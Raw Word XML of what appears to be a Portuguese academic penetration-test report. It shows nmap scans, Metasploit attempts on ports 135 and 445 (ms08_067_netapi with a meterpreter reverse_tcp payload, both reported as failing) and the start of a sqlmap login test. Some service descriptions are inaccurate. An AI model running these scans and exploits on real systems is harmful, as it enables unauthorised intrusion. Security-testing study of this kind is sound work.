        <w:t>figura 6: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etbios-n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NetBios [4]; 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etbios -dgm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serviço de datagrams do NetBios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snmp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microsoft-ds</w:t>
      </w:r>
      <w:r w:rsidR="00F5692A" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> - protocolo utilizado pelo sistema operacional W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indows para compartilhamento e impressões de arquivos; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F5692A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L2TP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135D8" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(Protocolo de Encapsulamento de C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amada 2</w:t>
      </w:r>
      <w:r w:rsidR="005135D8" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00915C31" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> [11] 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>– Protocolo de encapsulamento da Internet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, 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utilizado por uma conexão de </w:t>
      </w:r>
      <w:r w:rsidR="00F5692A" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>VPN</w:t>
      </w:r>
      <w:r w:rsidR="005135D8" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (rede virtual privada) para acessar uma rede privad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D56FE7" w:rsidRDefault="006515FB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>nat-t-lik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protocolo de tradução de ips.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00D56FE7" w:rsidRDefault="00F5692A" w:rsidP="0033576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</w:t>
      </w:r>
      <w:r w:rsidR="003F4807" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ntp</w:t>
      </w:r>
      <w:r w:rsidR="003F4807" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> [3] - protocolo de sincr</w:t>
      </w:r>
      <w:r w:rsidR="006515FB" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>onização de relógios usando UDP.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3154F" w:rsidRPr="00D56FE7" w:rsidRDefault="00A83EB9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 nmap -A -O IP_do_servidor.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A5DFB" w:rsidRPr="00D56FE7" w:rsidRDefault="001A5DFB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nmap” executa a ferramenta Nmap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A” é para usar o Tracerouter na requisição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informa o IP onde está hospedada a aplicação em teste.</w:t>
      </w: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686A" w:rsidRPr="00D56FE7" w:rsidRDefault="0005686A" w:rsidP="00335763">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista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5686A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 e</w:t>
      </w:r>
      <w:r w:rsidR="00AF04A2" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> a rota traçad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AF04A2" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>pelo Tracerouter.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0005686A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15FB" w:rsidRPr="00D56FE7" w:rsidRDefault="005967D5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A79EE" w:rsidRPr="00D56FE7" w:rsidRDefault="0005686A" w:rsidP="003357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De acordo com a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>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figura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>s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239F" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidR="00185ED4" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> e 8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E239F" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>a rota traçada para a requisição ao servidor.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A79EE" w:rsidRPr="00D56FE7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DCFA425" wp14:editId="31D90B57">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>262890</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>260985</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5019675" cy="3475355"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21430"/>
                <wp:lineTo x="21559" y="21430"/>
                <wp:lineTo x="21559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7 - Rota traçada pelo Tracerouter - Parte 1</w:t>
      </w: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35763" w:rsidRDefault="00335763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D56FE7" w:rsidRDefault="00BF5785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Serviços e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Pr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>7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Microsoft Windows RPC</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Ferramenta semelhante ao TeamViewer que conecta o computador criando um esquema de servidor - cliente; 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 xml:space="preserve"> uma distribuição Windows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185ED4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BF5785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D56FE7" w:rsidRDefault="00530877" w:rsidP="0033576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D56FE7" w:rsidRDefault="00530877" w:rsidP="00335763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D56FE7" w:rsidRDefault="00335763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2832A456" wp14:editId="39D73D27">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-13335</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>260985</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5400040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8 - Rota traçada pelo Tracerouter - Parte 2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B700D" w:rsidRPr="00D56FE7" w:rsidRDefault="006B700D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Default="000D5C45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</w:t>
      </w:r>
      <w:r w:rsidR="00A83EB9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:rsidR="001A1CBE" w:rsidRPr="00D56FE7" w:rsidRDefault="001A1CBE" w:rsidP="003357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357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 nmap -sV -p 1-65535 -O IP_do_servidor.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00831A3E" w:rsidRPr="00D56FE7" w:rsidRDefault="00831A3E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nmap” executa a ferramenta Nmap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sV” permite que a ferramenta realize o SYN</w:t>
      </w:r>
      <w:r w:rsidR="003D23F9" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> e busque a versão do software </w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>rodando no momento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p” indica quais portas devem ser usadas no teste, o delimitador é “-”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</w:t>
      </w:r>
      <w:r w:rsidR="00B3361B" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sistema operacional 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33576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é o IP onde está hospedada a aplicação em teste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178EE" w:rsidRPr="00D56FE7" w:rsidRDefault="003178EE" w:rsidP="00335763">
      <w:pPr>
        <w:pStyle w:val="Pargrafoda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3178EE" w:rsidRPr="00D56FE7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abertas e a versão dos serviços que estão rodando nessas portas no momento do escaneamento.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003178EE" w:rsidRPr="00D56FE7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79D1" w:rsidRPr="00D56FE7" w:rsidRDefault="005967D5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78EE" w:rsidRDefault="003178EE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9,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s portas abertas e a versão dos serviços que estavam rodando nessas portas no momento do escaneamento.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D5C45" w:rsidRPr="00D56FE7" w:rsidRDefault="000D5C45" w:rsidP="00335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3DD29" wp14:editId="73783B11">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>291465</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>80010</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="491998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9D1" w:rsidRPr="00D56FE7" w:rsidRDefault="005F79D1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D56FE7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0D5C45" w:rsidRDefault="000D5C45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9 - Versão do software rodando nas portas escaneadas</w:t>
      </w:r>
      <w:r w:rsidR="000D5C45">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> via Nmap.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D5C45" w:rsidRDefault="00530877" w:rsidP="000D5C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530877" w:rsidRPr="00D56FE7" w:rsidRDefault="00530877" w:rsidP="000D5C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3178EE" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>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9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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Microsoft Windows RPC</w:t>
      </w:r>
      <w:r w:rsidR="00530877" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Ferramenta semelhante ao TeamViewer que conecta o computador criando um esquema de servidor - cliente; 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Microsoft Windows microsoft-ds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Apache httpd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Microsoft Windows 98 netbios-ssn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r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2B1EF3" w:rsidRPr="00D56FE7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D56FE7" w:rsidRDefault="00AA00BE" w:rsidP="000D5C4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D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Microsoft Firmware Ppt</w:t>
      </w:r>
      <w:r w:rsidR="00530877" w:rsidRPr="00D56FE7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D56FE7" w:rsidRDefault="00530877" w:rsidP="000D5C45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A83EB9" w:rsidP="00F313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8C6DC7" w:rsidRPr="00D56FE7" w:rsidRDefault="008C6DC7" w:rsidP="00F313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Utilização do comando nmap -sU -p 1-65535 IP_do_servidor.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00D56FE7" w:rsidRDefault="008C6DC7" w:rsidP="00F31372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AF248B" w:rsidRPr="00D56FE7" w:rsidRDefault="00AF248B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nmap” executa a ferramenta Nmap.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7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sU” permite que a ferramenta use o detector de portas UDP.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00184BA7" w:rsidRPr="00D56FE7" w:rsidRDefault="00184BA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p” indica quais portas devem ser usadas no teste, o delimitador é “-”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7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>utilizado pelo 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FE6FEB" w:rsidRPr="00D56FE7" w:rsidRDefault="008C6DC7" w:rsidP="00F31372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é o IP onde está hospedada a aplicação em teste.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00D56FE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C3F25" w:rsidRPr="00D56FE7" w:rsidRDefault="009C3F25" w:rsidP="00F31372">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista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9C3F25" w:rsidRPr="00D56FE7" w:rsidRDefault="009C3F2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o sistema operacional utilizado pelo servidor explorado, as portas UDP abertas e a versão e os serviços que estão rodando nessas portas no momento do escaneamento.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C3F25" w:rsidRPr="00D56FE7" w:rsidRDefault="009C3F2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0857" w:rsidRPr="00D56FE7" w:rsidRDefault="005967D5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9C3F25" w:rsidRDefault="001A1CBE" w:rsidP="00F31372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A5BBE1E" wp14:editId="0C99706D">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-108585</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1214755</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5705475" cy="4083685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BA7" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>De acordo com a figura 10</w:t>
      </w:r>
      <w:r w:rsidR="009C3F25" w:rsidRPr="00D56FE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foi possível descobrir o sistema operacional utilizado pelo servidor explorado: </w:t>
      </w:r>
      <w:r w:rsidR="009C3F25" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Windows Server 2003.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C3F25" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Também foi possível descobrir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as portas</w:t>
      </w:r>
      <w:r w:rsidR="00184BA7" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> UDP</w:t>
      </w:r>
      <w:r w:rsidR="009C3F25" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> abertas e a versão dos serviços que estavam rodando nessas portas no momento do escaneamento.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00D56FE7" w:rsidRDefault="00F31372" w:rsidP="00F31372">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="70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igura 10 - Versão do software ro</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>dando nas portas UDP escaneadas via Nmap.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC5D2B" w:rsidRPr="00D56FE7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D56FE7" w:rsidRDefault="00477883" w:rsidP="00F31372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ncontrados na figura 10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netbios-n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NetBios [4]; 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netbios -dgm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- serviço de datagrams do NetBios ;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nm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D56FE7" w:rsidRDefault="00A66072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microsoft-d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- protocolo windows para compartilhamento e impressões de arquivos; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00915C31" w:rsidRPr="00D56FE7" w:rsidRDefault="00915C31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L2T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b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(Protocolo de Encapsulamento de Camada 2)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:rsidR="00967B9F" w:rsidRPr="00D56FE7" w:rsidRDefault="00477883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nat-t-like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 - protocolo de tradução de ips.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A66072" w:rsidRDefault="00477883" w:rsidP="00F313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A66072" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ntp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</w:t>
      </w:r>
      <w:r w:rsidR="00967B9F" w:rsidRPr="00D56FE7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40857" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>UDP.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A1CBE" w:rsidRDefault="001A1CBE" w:rsidP="001A1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Pr="00D56FE7" w:rsidRDefault="001A1CBE" w:rsidP="001A1C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90230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2.2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taque à porta RPC - via </w:t>
      </w:r>
      <w:r w:rsidR="00FE6FEB" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Metasploit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10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taque à porta RPC descoberta na análise de servidor via Nmap realizada anteriormente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se conectar à porta 135 usando o framework Metasploit</w:t>
      </w:r>
      <w:r w:rsidR="00902307" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, ferramenta abordada no subcapítulo 3.2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tentar conseguir privilégios dentro do Windows.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00D56FE7" w:rsidRDefault="008C6DC7" w:rsidP="00902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30AAF" w:rsidRPr="00D56FE7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entar configurar algum exploit </w:t>
      </w:r>
      <w:r w:rsidR="00902307" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>para atac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 porta 135. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00830AAF" w:rsidRDefault="00830AAF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Pr="00D56FE7" w:rsidRDefault="00830AAF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30AAF" w:rsidRPr="00D56FE7" w:rsidRDefault="00830AAF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exploit não consiga ser executad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71C6D" w:rsidRDefault="005967D5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ferramenta </w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>é de difícil configuração e possui</w:t>
      </w:r>
      <w:r w:rsidR="00902307" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> uma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902307" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>bibliografia</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> muito ruim para iniciantes.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Não foi possível obter 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>nenhum resultad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Pr="00D56FE7" w:rsidRDefault="00830AA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exploit escolhido para testar o caso específico da porta RPC foi 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uxiliary/scanner/msf/msf_rpc_login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O payload a ser executado é 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/meterpreter/reverse_tcp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payload força a máquina atacada a abrir uma conexão com a máquina atacante via TCP. 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AF04A2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A5B8E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exploit não consiga ser executado.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exploit foi enviado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, ma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ão trouxe resultado. Após verificação, foi constatado que o exploit é voltado pra Windows NT. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00830AAF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0AAF" w:rsidRDefault="00830AAF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83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:rsidR="003243CE" w:rsidRPr="00D56FE7" w:rsidRDefault="003243CE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atacar a porta 445 usando exploits automatizados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Para esse caso, o exploit escolhido foi o MS08-67 disponível no caminh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/windows/smb/ms08_067_netapi.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Ele serve especificamente para explorar uma vulnerabilidade do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microsoft d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  <w:r w:rsidR="007E0AF9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Utilizar mesmo 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yload </w:t>
      </w:r>
      <w:r w:rsidR="007E0AF9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>cit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2: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/meterpreter/reverse_tcp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payload força a máquina atacada a abrir uma conexão com a máquina atacante via TCP. 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D56FE7" w:rsidRDefault="00AF04A2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FE6FEB" w:rsidRPr="00D56FE7" w:rsidRDefault="00FE6FEB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exploit não consiga ser executado.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00D56FE7" w:rsidRDefault="008C6DC7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D76012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O exploit não foi executado na máquina do servidor.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C728E" w:rsidRPr="00D56FE7" w:rsidRDefault="005C728E" w:rsidP="00830AAF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5C728E" w:rsidRDefault="005C728E" w:rsidP="005C72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51591" w:rsidRPr="00D56FE7" w:rsidRDefault="0048383A" w:rsidP="005C728E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="-142"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"/>
        <w:ind w:hanging="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4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003243CE" w:rsidRPr="00D56FE7" w:rsidRDefault="003243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atacar a porta 135.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE6FEB" w:rsidRPr="00D56FE7" w:rsidRDefault="008C6DC7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exploit escolhido foi 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auxiliary/scanner/msf/msf_rpc_login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 para testar o caso específico da porta RPC escolhida. O payload a ser executado é o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windows/meterpreter/reverse_tcp.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Esse payload força a máquina atacada a abrir uma conexão com a máquina atacante via TCP. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE6FEB" w:rsidRPr="00D56FE7" w:rsidRDefault="00FE6FEB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6FEB" w:rsidRPr="00D56FE7" w:rsidRDefault="00AF04A2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A5B8E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exploit não consiga ser executado.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00751591" w:rsidRPr="00D56FE7" w:rsidRDefault="00751591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243CE" w:rsidRPr="00D56FE7" w:rsidRDefault="005967D5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5C728E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 xml:space="preserve"> O exploit não foi executado na máquina do servidor.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003243CE" w:rsidRPr="00D56FE7" w:rsidRDefault="003243CE" w:rsidP="003243CE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3243CE" w:rsidP="003243C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2.3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Tela de Login – Sqlmap</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00D56FE7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no dia 11/04.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00D56FE7" w:rsidRDefault="005A089C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2 horas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tilizar a ferramenta Sqlmap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automatizar o processo de detecção de vulnerabilidades na tela de Login </w:t>
      </w:r>
      <w:r w:rsidR="003243CE" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>utiliz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injeção SQL.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003243CE" w:rsidRPr="00D56FE7" w:rsidRDefault="003243C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B3425E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:rsidR="00FE6FEB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Verificar se a tela de Login é vulnerável a injeção de código SQL. Caso haja vulnerabilidade, conseguir obter o nome do banco de dados utilizado pelo sistema.</w:t>
      </w:r>
      <w:r w:rsidR="00FE6FEB" w:rsidRPr="00D56FE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E6FEB" w:rsidRPr="00D56FE7" w:rsidRDefault="004B2991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realizar essa s</w:t>
      </w:r>
      <w:r w:rsidR="00FE6FEB" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>essão de tes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FE6FEB" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> foi necessário utilizar a ferramenta Burp Suite para capturar as informações de cookie contidas no cabeçalho de requisição HTTP no momento em que a página do Login é acessada. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC5D2B" w:rsidRPr="00D56FE7" w:rsidRDefault="00B3425E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 wp14:anchorId="519282A1" wp14:editId="7CAA2C3B">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>443865</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>75565</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4772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57" y="21466"/>
                <wp:lineTo x="2155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8A" w:rsidRPr="00D56FE7" w:rsidRDefault="000D038A" w:rsidP="003243C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1A5B8E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1- Parâmetros obtidos através do Burp Suite.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003243CE" w:rsidRPr="00D56FE7" w:rsidRDefault="003243CE" w:rsidP="003243C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D20770" w:rsidP="00B3425E">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="16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A5289A" w:rsidRDefault="008C6DC7" w:rsidP="00B3425E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A5289A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>./Sqlmap.py -u "</w:t>
      </w:r>
      <w:hyperlink r:id="rId19" w:history="1">
        <w:r w:rsidRPr="00A5289A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http://IP_do_servidor/</w:t>
        </w:r>
        <w:r w:rsidR="009C5396" w:rsidRPr="00A5289A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nome_do_sistema</w:t>
        </w:r>
